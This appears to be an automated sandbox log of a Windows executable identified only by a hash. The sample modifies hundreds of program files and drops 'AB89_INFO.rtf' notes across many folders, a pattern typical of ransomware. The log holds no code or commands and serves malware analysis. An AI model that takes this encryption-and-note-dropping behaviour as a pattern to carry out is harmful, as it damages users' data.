095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\browser\features\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lv.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\FindSuspend.M2TS 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrome.7z 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\docs.crx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe 